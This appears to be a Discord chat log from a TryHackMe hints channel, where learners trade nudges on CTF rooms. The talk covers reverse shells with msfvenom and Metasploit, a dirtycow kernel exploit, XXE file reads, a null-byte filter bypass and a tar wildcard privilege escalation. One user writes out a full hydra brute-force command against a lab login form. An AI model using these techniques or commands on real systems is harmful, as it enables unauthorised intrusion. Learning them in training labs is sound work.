#room-hints

1 messages · Page 85 of 1

stuck fractal
#

Root flags are normally in /root/root.txt

hearty jackal
#

grr... now i feel dumb

#

though cd ing out would get me back on my own computers files... didnt think it would stay in the mounted drive

#

will need some sleep after this

stuck fractal
hearty jackal
#

yeah idk what I was thinking... lol

#

there... done. Thanks again for the help. did alot of rooms today and my brain is fried now. Good night!

ionic cedar
#

hey guys i'm back emm... How do you get your token of discord? i've been trying for a while but well you know

stuck fractal
#

To verify? It's on your THM profile

ionic cedar
#

oh :v

#

ok... now could you tell why is that the answer please?

sly totem
#

hi

ionic cedar
#

hey

white salmon
cedar axle
ionic cedar
#

oh ok wait

cedar axle
#

use flag -vv

#

instead of -v3

ionic cedar
#

ok wait

#

ok I got it, now i feel dumb :v

true widget
#

i am struck at privelege escalation on blog.I am currenly www-data user.Any hint would be highly appreciated.Meanwhile I found a database config file which gave me username and password for mysql.is it a rabbit hole?

normal fog
#

if you had tried brute forcing with all the users you have found for foothold ..now you know what to do👍

true widget
cedar axle
cunning quartz
#

can anybody help me in this

#

im doing the active directory room in which we have to bruteforce the usernames using the the given wordlist, but it says no valid username found

white salmon
#

Hi, I think what is easy job for just start??
Like maybi web site where y can learn simple thing??

#

Hello, i'm doing https://tryhackme.com/room/chillhack. Found the rce, and I'm trying to bypass the blacklist. I've been able to list the files with find and seeing the content with grep

#

but there's no id_rsa key or other things that can grant me access.

#

I've also see that the php file split with spaces, so i've tried inject payload with ${IFS} notation but nothing, it doesn't execute. Any hints?

burnt sierra
#

I'm stuck on Encryption - Crypto 101 room https://tryhackme.com/room/encryptioncrypto101, task 9 - SSH Authentication, task 1. " I recommend giving this a go yourself. Deploy a VM, like Linux Fundamentals 2 and try to add an SSH key and log in with the private key."

In hints it says "ssh-keygen, ssh-copy-id, or manually copying the key into authorized_keys with cat."

No idea what I should actually do. Like I have the username and password, I can login with SSH just fine. What do I do then? I generated a keypair with ssh-keygen in shiba2, then I tried to copy the id_rsa file with scp but it didnt work. What should I actually do?

#

also whats the point of all this if I already have the login info

ripe hedge
#

generate the key locally

#

then add the public key to the target account

native mesa
#

yes please... 🙂

ripe hedge
#

oh gods that one

#

it's more a spec number than a classification

white salmon
#

in the resources the box is giving at the start

#

It's the best I can give without giving you the answer

ripe hedge
#

we're talking about the same thing?

true widget
#

I am struck in agent sudo enumeration part.Any hints would be appreciated

ripe hedge
#

which part?

white salmon
ripe hedge
#

because I didn't find the answer directly in the resources

cedar axle
#

me either

ripe hedge
#

and the question wasis poorly worded

#

yes

cedar axle
#

the question is totally unrelated to the task

ripe hedge
#

not totally unrelated

white salmon
#

Yeah I agree but I did find it in it

ripe hedge
#

apparently it's referred to it that way in some Cisco training materials

white salmon
#

But yeah I struggled a lot

ripe hedge
#

I saw the list of IPs, recognized them....

cedar axle
#

private ip ranges

ripe hedge
#

unless you mean the MITRE material

white salmon
#

I gave up like 3 times before trying the RFC thing

cedar axle
#

i had to get a pretty big hint

white salmon
#

I had already try it when I started the room but it kept me saying « wrong answer »

ripe hedge
#

I saw specification written in one of the chats

#

rather than classification

white salmon
#

Yes I did too

ripe hedge
#

then I said no. no. no. that can't be...f

white salmon
#

Ahahaha I’ve overthought many times in this room

#

Especially at that question

ripe hedge
#

so the wikipedia page has it...

#

assuming you google the right terms

cedar axle
#

but how are they IOC's

ripe hedge
#

yeah I don't know, I think there was a misunderstanding

#

it's more the malware checking that you didn't break it's dns

#

from what I understood anyways

cedar axle
#

the malware checks to see if the c&c server's names resolve to an internal IP and then deactivates itself if it does

ripe hedge
#

yeah

candid nimbus
#

Takes the prize for most annoying and time wasting question of the month. In the provided log, if you pull up a relevant event, there's a tab for modules within each. It will be at the bottom. For extra hint ||it doesn't have a name!!!!! Hilarious eh?||

candid nimbus
#

Get it & facepalm! I was in the same boat with that one staring at the logs & wondering what I was doing wrong until the penny dropped. Good luck!

median compass
#

lol like the physical pentesting room, I had one or two of those left hanging for ages

native mesa
white salmon
#

Good job !

rose cape
#

hello guys! need help final task of 0day room. having trouble getting a working ||dirtycow|| binary over to the machine and obv having difficulties compiling it with the ||broken gcc binary|| could i get a nudge in the right direction?

ionic cedar
#

Hey guys could you help to find how can I know what ports is SMB running on?

stuck fractal
#

Nmap

#

And research

ionic cedar
#

Oh ok i tought that I have to use enum4linux lol

sonic wigeon
stuck fractal
rose cape
sonic wigeon
#

Are you using the ||overlayfs|| one right ?

rose cape
#

ah no i wasnt

sonic wigeon
#

Try that one

ionic cedar
stuck fractal
#

daemon

#

smb daemon

#

like sshd

ionic cedar
#

oh ok thanks

#

another question, I used the flag -M to get the name of the machine but I don't understand what it shows up

ripe hedge
#

it says not implemented

ionic cedar
#

but why?

#

Do i need to make some update or something like that?

ripe hedge
#

might be worth a check

rose cape
ionic cedar
ripe hedge
#

might need some other way then

#

not much we can do about it, I'm afraid

ionic cedar
#

so you think that is some code problem or SO problem?

ripe hedge
#

It's a their code problem

#

So you'll need to find another way to get what you want

cyan birch
#

Hi hi

#

How to explore this?

lime violet
#

Explore what exactly

stuck fractal
#

@cyan birch is this a tryhackme room?

#

What room?

#

Closed ports aren't really useful though.

stuck fractal
#

And the followup question?

cyan birch
stuck fractal
#

What room is this?

cyan birch
cyan birch
stuck fractal
#

Come back in 7 minutes with a proper screenshot

cyan birch
#

Ok XD

white salmon
#

Yoo

cyan birch
#

Yoo

white salmon
#

im stuck on a box

#

giving hints here is fine ?

cyan birch
#

Idk

white salmon
#

anyone did the marcket box ?

cyan birch
#

What is the name of the room?

white salmon
#

The Marketplace

#

im stuck on the priv esc

cyan birch
#

I'll try

white salmon
#

i found a backup script can run by an other user

#

it has a tar wildcard but i dont know how to use that on my side

#

i dont wanna check out the writeups

stuck fractal
#

#room-help is for after you've checked the writeups

white salmon
stuck fractal
#

¯_(ツ)_/¯

lime violet
#

Sometimes the simple answer is the right one

white salmon
#

Did you check /home

#

the robots.txt doesnt only have the flag1 it has more

floral osprey
#

what domain name did u used ? I tried with my IP but it didn't worked and I can't edit the /etc/hosts

floral osprey
gusty kite
#

still under embargo

modest swift
#

its a walkthough lmfao

gusty kite
#

still

#

the domain is mentioned

floral osprey
#

we used the one by default ?

stuck fractal
#

Walkthrough rooms are not covered under the embargo

floral osprey
#

what is this embargo about ?

floral osprey
gusty kite
stuck fractal
glacial gust
#

linux agaency is the only challenge I can think of like that

stuck fractal
floral osprey
glacial gust
floral osprey
#

the first one

gusty kite
#

just run the script as mentioned

#

it will ask for the filenames etc

floral osprey
simple mountain
#

Do not provide or ask for help or hints for the Broker room until 13th March, 7pm (GMT)

floral osprey
#

😫

glacial gust
#

but if you follow the example from the task before you should get what you need

floral osprey
glacial gust
gusty kite
glacial gust
#

my issue was around command structure vs the script, but if the script is broken you should put it in #room-bugs so it can get fixed

gusty kite
#

dont recall exactly what the problem was. something with python3 not being new enough to accept the new f"fo fo {foo} fo fo" format

ionic cedar
#

Guys could you help me? How can I access to those files? I was reading about the smbclient commands but I couIdn't find something useful

glacial gust
#

you would need to either copy them to your machine or try a command like less or more

ionic cedar
#

Ok the task says that I have to assume who this profile belongs to. Could you help with a hint?

glacial gust
#

which room is this

ionic cedar
#

network services 1

glacial gust
#

check the Work from home doc

#

that one would the most likely to give you some hints to go off

ripe hedge
ionic cedar
#

yeah I was thinking that file look interesting, so to check the file i need to copy it to my machine, right?

floral osprey
ionic cedar
floral osprey
white salmon
#

to find out about who owns the files

ionic cedar
#

I tried to copy the file but I got this

glacial gust
#

try get

ionic cedar
#

ok i did it, so what's the difference between get and scopy?

glacial gust
#

the program, smbclient has some built in commands for copying

ionic cedar
#

Ok I noticed that the new file was created in my home directory, how can i change the location of the new folder?

#

new file*

glacial gust
#

on your machine, smb will put it where you launch the app from, if you want it somewhere else you can just copy it to the folder

ionic cedar
#

oh ok very useful information

ionic cedar
#

Guys I got stuck here could you help with a hint?

#

last question of the task 4 in network services 1

opal vine
#

guys i'm doing the madness room and i found the hidden directory and it's saying to obtain my identity you need to guess my secret
i think it's a stego thing with the picture i used stegcracker with a wordlist of numbers betwen 0-99 but it didn't work

#

what should i be doing?

woven mirage
#

Forget the picture 👀

#

What kinds of inputs can you put in a webpage?

opal vine
#

what do you mean with webpage inputs

opal vine
woven mirage
#

dont look for directories

#

how can you do a query in an url?

opal vine
#

using curl?

woven mirage
#

search what's a query string

opal vine
#

or is it "?" like when u have an RCE

opal vine
#

how do i know what is the appropriate identifier

short fox
opal vine
#

ok i guess it's ||secret||

#

@short fox @woven mirage it worked guys thanks
i got some weird username but i'll solve that my own
just wanted to say thanks

woven mirage
#

no problem tipsfedora

ionic cedar
glacial gust
#

did you copy the key

ionic cedar
#

yeah and I changed the permissions

glacial gust
#

run the command ssh -i <keyname> <user>@<ip> and you should connect to the host

ionic cedar
#

ok but how do I get the username?

glacial gust
#

you can try the first name that you found earlier

ionic cedar
#

oh really?

#

I was expecting something more complex ._.

glacial gust
#

this is a learning box, many of the others don't always directly give you it

ionic cedar
#

ok

#

I tried what you told me but it says connection closed by port 22

#

I think that I did something wrong

stuck fractal
#

Wrong username

#

@atomic sail Please don't ask the same question over multiple channels

ionic cedar
stuck fractal
#

First things first, unix usernames are ALWAYS lower case

ionic cedar
#

ok I didn'y know that

#

didn't*

#

Oh shit I did it, It took all the day just to complete the task 4

amber glacier
#

I am stumped: Alfred

  • Got Powershell reverse shell via Netcat
  • was able to upload the msfvenom generated exploit to webserver
  • Instantiated Metasploit /multi/handler
#
  • ran paylod, established connection to Metasploit
  • metasploit accepts connection but not "Meterpreter" indicating i can run commands. When I enter commands, nothing but a blank screen
stuck fractal
#

Did you set your payload in multi/handler to the same type that you generated?

amber glacier
#

checking... but I already see what you are saying. My venom was not set to that payload type... Doh! Thanks for the tip!!!!

#

These mistakes would not be made if I just copied and pasted... forcing myself to do it without script kiddying.... 😦

amber glacier
stuck fractal
#

The default payload for multi handler seems to be all over the place, and I think people often forget to set it

amber glacier
#

You're right... once i popped options lightbulbs hit

north pier
#

Hey Friends, I'm in Psycho Break - the Evil Within themed room; in the 'Safe Heaven' I uncovered something that indicates it is a Base64 encoded string, but it doesn't decode properly. Any hints on this issue?

north pier
ripe owl
#

I am doing brokerv10 room. I am confused on 3rd questions is mqtt client a service or a tool?how to use this mqtt client. Googling gives some mosquitto_pub

#

I dont want anything related to question. Just what is mqtt client

true widget
#

Hi guys I am solving Madeye's Castle.I found|| access to smb share for harry|| but dont know how to proceed.Tried bruteforcing ssh with the spell list found from smb share but no luck.A nudge is needed😊 .Thanks in advance!!!!

ripe hedge
ripe hedge
#

That wordlists is important for later

true widget
ripe hedge
#

There should be some info gleaned from SMB about the machine name

true widget
#

it doesnt require bruteforcing right?

ripe hedge
#

There's probably more than one server running on that port, don't you think?

#

The brute forcing comes later :p

true widget
ripe hedge
#

look up vhosts

untold fulcrum
#

hi, is anyone have a script to get the messages about videogame for question 3 in "broker" room?

gusty kite
#

@untold fulcrum see pinned message

untold fulcrum
#

it's good I found another way

ripe hedge
#

can't help on new rooms for a few days after release

untold fulcrum
#

@ripe hedge ok no problem. I rooted the box anyway

sleek rose
#

HELLO People I'm in hackpark room I generated msfvenom shell and upload it

#

when I run it over the target windows server it shows the meterpreter started but no shell received, as appear here

#

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.8.124.XXX:44XX

#

@untold fulcrum

pale rampart
#

Hello

#

Guys, I have question regarding room broker

#

apache_activemq_upload_jsp is right or wrong exploit?

stuck fractal
proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

That last bit. It's still under embargo.

pale rampart
#

oh

strange mist
#

I'd like to use this time and place to wish the person at oracle deciding to put the java package behind mandatory registration a hedgehog surprise in their next poop

ripe hedge
#

the JDK?

#

yeah don't use Oracle's

unreal storm
#

nmap -sC -sV -T4 -A 10.10.149.120 -o scan.nmap

stuck fractal
#

Where did you find that IP?

unreal storm
#

Is that the right command to find the port 3333 on vulnhub

stuck fractal
#

Vulnhub?

unreal storm
#

top right of my attack box

#

Yes

stuck fractal
#

Not the target machine

#

And you're talking about vulnversity. Vulnhub is a different platform.

unreal storm
#

Vulnuniversity

stuck fractal
#

Click the green deploy button in Task 1

#

Use the IP under Active Machine Information

unreal storm
#

Thanks, no help needed now ❤️

#

Which wordlist should I use to find the form, I'm using gobuster

stuck fractal
#

Just pick a directory wordlist

unreal storm
#

Uploaded a shell to the vulnuniversity site, how do I do this question:
What is the name of the user who manages the webserver?

#

I believe I must run a command in the shell to send all usernames

stuck fractal
#

You uploaded a shell. You need to get the webserver to run it, and get your reverse shell.

unreal storm
#

I did, I have cli access

#

Do I have permission to add you and share a photo of my work so far @stuck fractal ?

stuck fractal
#

!docs verify

proud scarabBOT
stuck fractal
#

Follow that link, verify with the bot, then you can post screenshots.

true widget
#

I am about to ask a question which seems a bit stupid tbh

unreal storm
#

Done

true widget
#

I am solving the madeye castle room.I found the login panel (vhosts).I know the username but How can I bruteforce it with hydra??

unreal storm
#

How do I find the name of the user that manages the apache web server?

true widget
#

here is the command I am using hydra -L Lucas Washington -P spellnames.txt 10.10.24.241 -server hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:The password for Lucas Washington is incorrect" -Vv -f -t 15

stuck fractal
#

It's not asking for who the webserver is running as

unreal storm
#

Finished it

#

Thanks bro

stuck fractal
#

Please don't call me bro.

dense warren
#

I need help with the Broker room, task: Which videogame are Paul and Max talking about?

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

ripe hedge
#

there are other ways in

timid frigate
#

yo, for the room broker, what M**T client should i use?

#

I'm trying to work with a python script but it's kinda shaky

#

oh, rule 13

#

nvm

ionic cedar
#

Hi guys. I got stuck in the task 7 question from network services 2. I know that I have to write that command line but where? in my telnet connection tab? Do I have to put .RUN before the command line? and how do I know which is my lport?

stuck fractal
#

It will not be installed on the target machine

#

You need to run that command on your own attacking machine to generate a payload

#

The payload is just a series of Linux commands chained together to give you a reverse shell

ionic cedar
#

Ok thanks that solve some questions, now how do I know which is my lport?

stuck fractal
#

It gives you one in the command

#

But it's arbitrary

true widget
ripe hedge
#

exploit it then

ionic cedar
#

just to be sure. Is the lhost my attacking machine's ip or my target machine's ip?

stuck fractal
#

So your attacking machine's IP. Specifically the THM VPN IP

ionic cedar
#

oh ok thanks yeah

ionic cedar
stuck fractal
#

It's one of many ways to generate a payload

#

You don't have to use msfvenom, and you can just change values in the payload if you want

ionic cedar
#

ooooh thanks

long gulch
#

I am having an issue with the Simple CTF room. I have compared with the writeups but I am stuck with the CVE when I try to run it myself. I have tried with python and python3. I have also modified the print to include () around so it shows up as print("themessage"). The script runs when I do that but I only get this: [+] Salt for password found: 2eavUt
[+] Username found : r
[+] Email found: dg
[+] Password found: 8f

edgy inlet
#

already finished Broker ,is great room

brisk pivot
#

Now that you've learned basic file operations, you can solve the first challenge! This challenge is pretty simple, create a file called noot.txt.

Once you're done run the binary and you'll be given the password for the user shiba2!

Note: the name of the binary is shiba1, as shown in the title

What's the password for shiba2

#

ok so I type cat > noot.txt but nothing happens

trim haven
#

Why are you trying to type cat > noot.txt?

brisk pivot
#

because it is the command the create a file on linux

#

in terminal

#

isn't

trim haven
#

May I ask where you learned that? Seems inefficient.

brisk pivot
trim haven
#

Try using touch [file_name] then ls to make sure the file is there. If it is, run the binary, if it is not then the box is broken. If you run the binary and nothing happens, it is probably broken. Restart the machine and try again.

brisk pivot
#

I was just in another site trying this

#

so touch filename

#

but it doesn't show anything after touch [file_name]

trim haven
#

Hm?

#

What do you mean?

brisk pivot
#

oops not well centered

#

better

#

if it shows any answers I am sorry

trim haven
#

Uhh

#

You're meant to be doing it on the box, not your own machine 😁

brisk pivot
#

but in the machine it does not show anything

#

nvm

#

it works

#

ty for the help! 😁

trim haven
#

No problem 😁

brisk pivot
#

Actually

#

it does not show the password

trim haven
#

Hm?

brisk pivot
trim haven
#

That is the attackbox.

#

Not the linux machine.

brisk pivot
#

oh

trim haven
#

You see the "start machine" button.

#

Click it

brisk pivot
#

ah

#

ok ty

#

ok so now I need to run it

#

why does it say permission denied

trim haven
#

Screenshot?

brisk pivot
trim haven
#

You cannot execute a text file

#

You need to execute the binary.

#

The binary is called "shiba1" as the task tells you 😄

brisk pivot
#

oh

#

yay!

#

I got it right

#

tysm for the help!

trim haven
#

No problem! Happy hacking.

brisk pivot
#

ty

stuck fractal
#

They're scripts

trim haven
#

James
Stop being smart for a moment

ionic cedar
#

guys could you help with a hint here? task 10 from network services 2. I have to crack the password but I'm not sure if the password is in that file? Where could I find the file that contain the posible password?

scarlet barn
ionic cedar
scarlet barn
#

The password file you wanna use isn't on the server, the password list should be pre-installed with your Kali.

ionic cedar
#

pre-installed with my kali? sorry I don't understand

scarlet barn
#

It should already be on your kali machine, it's a list of common passwords that's widely available online.

#

Otherwise known as a wordlist, try to reread the material for task 10 with this information.

ionic cedar
#

Oh great it was like rockyou.txt.gz

#

I had to change de permissions and unzip the file

scarlet barn
#

Ah yeah, I forgot it's gzipped by default, glad you figured it out :)

ionic cedar
#

yeah I swear I couldn't do it without you

white salmon
#

im stuck on battery room would asking for a hint

#

im *

cedar axle
white salmon
#

how can i make a null byte string

#

to bypass php checking ?

cedar axle
#

%00

white salmon
#

imma try

#

its worked but it returning it as *****email.a%00

#

at the end

cedar axle
#

use spaces

#

this is a SQL vuln

oak nacelle
#

Hey guys, the Blaster room's browser history has been deleted which i needed for a task. Can any1 help, please.

brisk pivot
#

I put 10.10.59.12 but get this

stuck fractal
#

Connect to the VPN

brisk pivot
#

with the open vpn?

cedar axle
#

yes

stuck fractal
#

The tryhackme VPN.

brisk pivot
#

so the blured part?

stuck fractal
#

No.

#

What IP is that? Where did you get it? What room?

brisk pivot
#

it is from openvpn connect

stuck fractal
#

What

#

Not the IP you redacted.

brisk pivot
#

I am confused rn xD

stuck fractal
#

The 10.10 ip you mentioned before.

brisk pivot
#

yes

cedar axle
#

what os are you running?

brisk pivot
#

task 3*

#

I can run all three

cedar axle
#

but which one are you connected to the vpn with?

brisk pivot
#

I did download putty on windows

#

the vpn?

#

OpenVPN is on my macos

cedar axle
#

run the openvpn on the same machine as putty

brisk pivot
#

ok I am downloading the openvpn on windows rn

#

brb

#

so I put that ip?

stuck fractal
#

No.

brisk pivot
#

ohhh I get it

#

my private ip

stuck fractal
#

No.

brisk pivot
#

oh

stuck fractal
#

You are SSHing into the VM you deployed in the room

#

Hence, you need the IP of that machine

brisk pivot
#

so the ip of vmware or the machine in tryhackme

#

oh

#

nvm

#

I get it now

#

ty for the help!

#

🙂

#

ok so I entered the password and it won't let me

#

and I used shiba1

stuck fractal
#

Where did you find that IP?

#

Where on the page?

brisk pivot
#

middle top

fickle bronze
#

Read the text again :)

brisk pivot
#

(Note: the 10.10.10.10 is just an example, and you should replace that with 10.10.61.74)

fickle bronze
#

Read the text you sent in the screenshot again.... Should've been more specific lel

brisk pivot
#

so I put the wrong ip?

brisk pivot
#

yea I did shiba1

stuck fractal
#

If that's the point you're trying to make

fickle bronze
#

Oh, will it?

brisk pivot
#

but the password don't work

stuck fractal
stuck fractal
brisk pivot
#

it is not?

stuck fractal
#

I'm connected to the VPN and I cannot ping it

brisk pivot
#

I need to stop the vpn?

stuck fractal
#

Terminate and redeploy the target

brisk pivot
#

so I need to stop my openvpn?

#

ok it is stoped

stuck fractal
#

That is not what I said

brisk pivot
#

but what is the target?

dusky vigil
#

Restart the box on the tryhackme website @brisk pivot

brisk pivot
#

ok

dusky vigil
#

You need to deploy it in order to have an ip address to connect to

#

Once it’s deployed you’ll see the target IP that you’re attacking on the web page 🙂

brisk pivot
#

so this is what I am attacking

dusky vigil
#

Yup just under IP address that is your target

brisk pivot
#

so 10.10.39.96

dusky vigil
#

Keep an eye on the timer as if that hits 0, the box will shut down

brisk pivot
#

ok

#

so I would have to do shiba1@10.10.39.96

dusky vigil
#

Yeah

brisk pivot
#

ok

dusky vigil
#

Everything that goes on within that lab will be on 10.10.39.96

brisk pivot
#

and I need my openvpn connect otherwise it won't work correct?

#

the password still does not work

dusky vigil
#

Yup so you'll need to connect to openvpn otherwise you won't be able to connect to any rooms on the platform

brisk pivot
#

optional may I dm you with the password that i used to not spoil it to everyone?

stuck fractal
#

it should be shiba1 if you're sshing into shiba1

dusky vigil
#

Think of it this way.
workflow

1. Deploy the room on Tryhackme.
2. Connect to the Tryhackme network using openvpn, you will be able to download the connection pack from https://tryhackme.com/access and once downloaded you should be able to connect with openvpn like `openvpn <your username>.ovpn`
3. you should then be able to interact with the IP address tryhackme gives you
brisk pivot
#

oh ok I got in

#

ty

stuck fractal
#

I think you're meant to use shiba2 with the password you got in the last room?

brisk pivot
#

(╯°□°)╯︵ ┻━┻

brittle marten
#

Can anyone nudge me in the right direction for the OWASP top 10 room for XXE?
I'm trying to figure out how to use XXE to find where the SSH key is located.

stuck fractal
#

It's in the default location for a user's SSH key

brittle marten
#

Thanks, I figured that was the case but I think the answer is asking for the filename and I don't know what that should be.

stuck fractal
#

Where is falcon's SSH key located? This one?

brittle marten
#

Actually, it turns out I did know what it was. But I thought I was supposed to understand how to run ls or something using XXE

stuck fractal
#

Full path.

#

XXE tends to be just files. You have expect: but that isn't enabled often

brittle marten
#

Ah right. I found expect:// online but it wasn't working. I thought I was doing something wrong.

#

Thanks.

worn otter
#

I'm stuck on something that should be super simple. This room: https://tryhackme.com/room/toolboxvim has a question in Task 2 that reads "How do we start entering text into our new Vim document?" and it's looking for a six letter answer. I can't seem to find it. Isn't it just i to enter insert mode? I've already answered everything else in this room, so it's just this one thing I can't get the syntax on.

stuck fractal
#

It's something you do once you're in insert mode

#

Same thing you did to send that message here

worn otter
#

🤦‍♂️ thanks

stuck fractal
#

It's a brilliantly dumb question

worn otter
#

agreed :). And here I was man'ing, grep'ing, and googling for long versions of the insert mode command

digital vector
#

can anyone help me with the looking glass room

gusty kite
#

what have you tried sofar?

digital vector
#

@gusty kite i ||tried to decode the cipher poem at the port .||

#

but still the key doesnt work

gusty kite
#

yeah look at the end of that

#

thats your secret

digital vector
#

|| burbled ? ||

gusty kite
#

err sorry. the key is the secret

#

at least it was for me

digital vector
gusty kite
#

are you sure? it closes the connection but gives you the creds

digital vector
gusty kite
#

what length did you use for the key?

digital vector
#

20

gusty kite
#

that should be fine

digital vector
#

did the same key work for you ?

gusty kite
#

ok I think I know the problem. you used the autosolver which is fine and all but once you get the proposed key, then fill that in and re-decode using that

#

then you will get it at the end of the text.

digital vector
#

ah

#

got in @gusty kite thanks 🙂

gusty kite
#

@digital vector its at sneaky funny room. Very well done

slender sand
#

Has anyone tried solving broker ?

#

I tried the metasploit module to upload, but it didn't worked.

#

If anyone can help ?

scarlet barn
#

I'm pretty sure broker still falls under the rule of no hints for 72 hours after release.

slender sand
scarlet barn
#

You should be able to ask about it tomorrow in the evening (atleast evening UK time, GMT)

modest swift
#

im still working on it but i think there's a bug

novel bay
#

hi guys

#

i was doing the linux agency room

#

and it tells me that a password is wrong even if it says it is correct on tryhackme

fickle bronze
soft light
#

@novel bay pic please

#

Along with exactly what you typed

novel bay
#

i figure it out

#

they're not the same

#

cause they're not intended to be used

#

but i did it in an "uninteded way"

#

and it asked the password for sudo -l

gusty kite
novel bay
#

no it wasn't that

#

i triple checked

#

the password was not set for the user

#

even if there is a flag

analog karma
#

hello y'all. Would it be fine to use metasploit for Skynet room, or that's like you can do it but you're missing the point

stuck fractal
#

it's a walkthrough, right?

#

IDK where you'd use msf in it?

analog karma
#

I did not want to read a walkthrough, I was thinking there could be something Samba related, but I could be totally wrong

stuck fractal
#

I wasn't telling you to read a writeup.

#

Eh it's somewhat guided

#

I don't think you'd get very much value using MSF on that room, I don't think it'd be that useful

analog karma
#

ok, thanks

modest swift
#

was just doing new room badbyte and the room has disappeared from the website? although im still connected to it

astral smelt
#

That was the challenge one, that was made private otherwise there would have been too many points if you're in badbytemq join badbyte

modest swift
#

oh right, maanged to get a few points out of it so 😂

proud needle
#

yep, same here😅

opal vine
#

can i ask for hint in badbyte?

#

i mean it's a walkthrough room

balmy verge
opal vine
balmy verge
#

read the first line in that task and look at the hint for the LFI question

median reef
#

refresh the page

#

it has been updated

balmy verge
#

actually the hint from the "Can you find any vulnerable plugins?"

median reef
#

🙂

opal vine
opal vine
median reef
#

i meant the room tasks are updated

balmy verge
opal vine
#

|| i used http-worpress-enum ||

balmy verge
#

led have u finished the box ?

opal vine
#

it didn't work

median reef
balmy verge
#

oh my B lol, its a nice box

median reef
#

thnx

opal vine
#

i liked the port forwarding

median reef
gusty kite
#

yeah good box

balmy verge
#

so are hints and help allowed for it ??

median reef
#

yes

balmy verge
#

um

gusty kite
#

cracking the pass is a bit tiresome

median reef
#

it is walkthrough room

balmy verge
median reef
balmy verge
#

cant seem to find the pass

median reef
gusty kite
#

linpeas did not find anything of interest

balmy verge
#

"Management now requires SSH sessions to be logged." is it related to adm and the auth.log ???

#

my eyes hurt from searching in the log dir for a pass

gusty kite
simple mountain
#

Do not provide or ask for help or hints for the h4cked room until 15th March, 7pm (GMT)

median reef
#

don't cause even i don't know the pass

viscid egret
median reef
#

did you also read the final task

#

first bullet point

balmy verge
#

its almost 2:30 am here 😩

median reef
#

4 for me kekw

#

there is always tomorrow or is there

balmy verge
#

not gonna be able to sleep if i dont root it

#

ughhh i cant believe i missed this

#

think i got it

gusty kite
#

found it

balmy verge
#

same

#

ahhh what a pleasant sight

gusty kite
#

interesting why it did not show up in linpeas

median reef
#

it did

#

make sure your tools are updated

#

the filename i mean

balmy verge
#

maybe bc its not owned by root but readable by the cth user only

#

like if it was in the adm group

gusty kite
#

I even tested with the one you left behind 🙂

balmy verge
#

Anyways great box, hope to see more blobheart

median reef
#

you guys know i like vim

#

also vim has logs

gusty kite
#

actually used that to find the config file for wordpress 😄

#

love vim

#

wrote a few books about it many years ago

median reef
#

👀

#

📖

brisk pivot
#

my putty does not work

median reef
#

for what room

brisk pivot
#

Linux Walkthrough (Web-Based) p.2

stuck fractal
#

Connect to the VPN.

brisk pivot
#

oh

#

right

#

oops

#

I'm stupid

#

ty

#

😅

#

I forgot that

#

no such file or directory

#

but why

#

I just did what they did in the image

#

the image:

stuck fractal
#

Because the shell is looking at the value of $nootnoot and putting it in

stuck fractal
#

You're throwing variables in there

brisk pivot
#

I did: cat test

stuck fractal
#

Ok

#

There isn't a file called test there.

brisk pivot
#

so in the picture they already have one?

stuck fractal
#

The images are illustration. They are not instruction.

brisk pivot
#

oh ok

stuck fractal
#

Also note that they're in /tmp/ll

brisk pivot
#

sounds good 👍

#

ok

#

ty

#

is shiba2 a file?

stuck fractal
#

Please provide some more context to your question

brisk pivot
#

nvm

#

I think that I found the answer to my question

cloud perch
#

can anyone help me out ive been stuck on task 5 "What is the CVE number for directory traversal vulnerability?" ive ran wpscan and nmap and im getting false psotives

#

im trying to figure out what cve that word press is vulnerable to but im might be doing something wrong

brisk pivot
#

What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file?

#

I don't get this question

brisk pivot
stuck fractal
#

We need context.

brisk pivot
#

hold on

#

Digit Meaning
1 That file can be executed
2 That file can be written to
3 That file can be executed and written to
4 That file can be read
5 That file can be read and executed
6 That file can be written to and read
7 That file can be read, written to, and executed

#

and I ned to type per example : 123

#

like the code

stuck fractal
#

That is not what I asked for at all.

brisk pivot
#

oh the room

stuck fractal
#

What room is it? What task number? What question?

#

That's the bare minimum of information you need to provide.

brisk pivot
#

Linux Fundamentals Part 2 Task 15

#

first question

stuck fractal
#

Ok. So do one digit at a time.

#

What's read only?

#

Wait before that

#

What order are the three digits?

brisk pivot
#

wait imma just recheck the instruction

#

hold on

#

first digit controls a permission for a user the second is for a group and the third is for everyone

stuck fractal
#

So that's usually stated as user, group, other

#

ugo

#

So let's go in that order

#

What should the perms for the user be?

#

(owner = user)

brisk pivot
#

should I have my putTY open?

#

or I don't need it

stuck fractal
#

You'll need it in a bit

brisk pivot
#

ok imma just start that up

#

ok I have it open

#

how you are asking what are the user perms?

stuck fractal
#

So, the question says?

brisk pivot
#

user can read the file, the group can read and write to the file, and no one else can read, write or execute the file.

#

it says that

stuck fractal
#

Yeah. So the owner/user.

#

We're doing this one digit at a time.

brisk pivot
#

yes

stuck fractal
#

What should the perms for the user be?

brisk pivot
#

so the first one is 4 because 4 is "that file can be read"

stuck fractal
#

Yeah.

#

And for Group?

brisk pivot
#

I think 6

stuck fractal
#

Ok, and how about others?

#

The last digit

brisk pivot
#

but it says write OR execute the file

#

and I just find AND

#

it would be 3 if it would be AND

stuck fractal
#

You're thinking too much

stuck fractal
brisk pivot
#

I am?

stuck fractal
#

Read Write OR Execute

#

None of the three

#

3 would be write and execute but not read. You don't want them to be able to do anything

#

They shouldn't be allowed to read or write or execute.

brisk pivot
#

so it is none?

stuck fractal
#

None is not a number, so no.

brisk pivot
#

ok so if none is not a number 0 is

stuck fractal
#

Do you know how you arrive at the numbers?

#

Because it's by adding 1, 2, and 4

#

1 is execute, 2 is write, 4 is read

#

So 1+4 = 5 which is read and execute

#

1+2+4=7, rwx

#

0 is none of those so no perms

brisk pivot
#

